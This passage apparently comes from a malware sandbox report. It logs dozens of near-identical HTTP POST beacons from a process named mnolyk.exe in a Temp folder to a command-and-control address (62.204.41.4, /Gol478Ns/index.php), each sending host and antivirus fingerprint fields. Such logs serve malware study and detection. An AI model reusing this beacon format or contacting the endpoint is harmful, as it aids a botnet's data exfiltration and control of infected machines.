                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    433192.168.2.35013662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:25.375931978 CET633OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:25.438723087 CET633INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:25 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    434192.168.2.35013762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:25.608006001 CET634OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:25.671648026 CET634INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:25 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    435192.168.2.35013862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:25.846129894 CET635OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:25.911890030 CET635INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:25 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    436192.168.2.35013962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:26.098524094 CET636OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:26.163223028 CET636INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:26 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    437192.168.2.35014062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:26.342715025 CET637OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:26.406277895 CET637INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:26 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    438192.168.2.35014162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:26.577111006 CET638OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:26.640788078 CET638INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:26 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    439192.168.2.35014262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:26.815454960 CET639OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:26.880913019 CET639INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:26 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    44192.168.2.34974662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:27.686671972 CET245OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:27.752453089 CET245INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:27 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    440192.168.2.35014362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:27.062953949 CET640OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:27.128356934 CET640INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:27 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    441192.168.2.35014462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:27.296113014 CET641OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:27.361238003 CET641INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:27 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    442192.168.2.35014562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:27.528968096 CET642OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:27.592056990 CET642INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:27 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    443192.168.2.35014662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:27.767390013 CET643OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:27.834901094 CET643INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:27 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    444192.168.2.35014762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:28.016338110 CET644OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:28.082880974 CET644INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:28 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    445192.168.2.35014862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:28.265922070 CET645OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:28.330866098 CET645INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:28 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    446192.168.2.35014962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:28.513257980 CET646OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:28.578936100 CET646INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:28 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    447192.168.2.35015062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:28.749109983 CET647OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:28.811218977 CET647INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:28 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    448192.168.2.35015162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:28.985342026 CET648OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:29.049519062 CET648INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:29 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    449192.168.2.35015262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:29.219203949 CET649OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:29.281686068 CET649INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:29 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    45192.168.2.34974762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:27.935502052 CET246OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:28.000261068 CET246INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:27 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    450192.168.2.35015362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:29.450735092 CET650OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
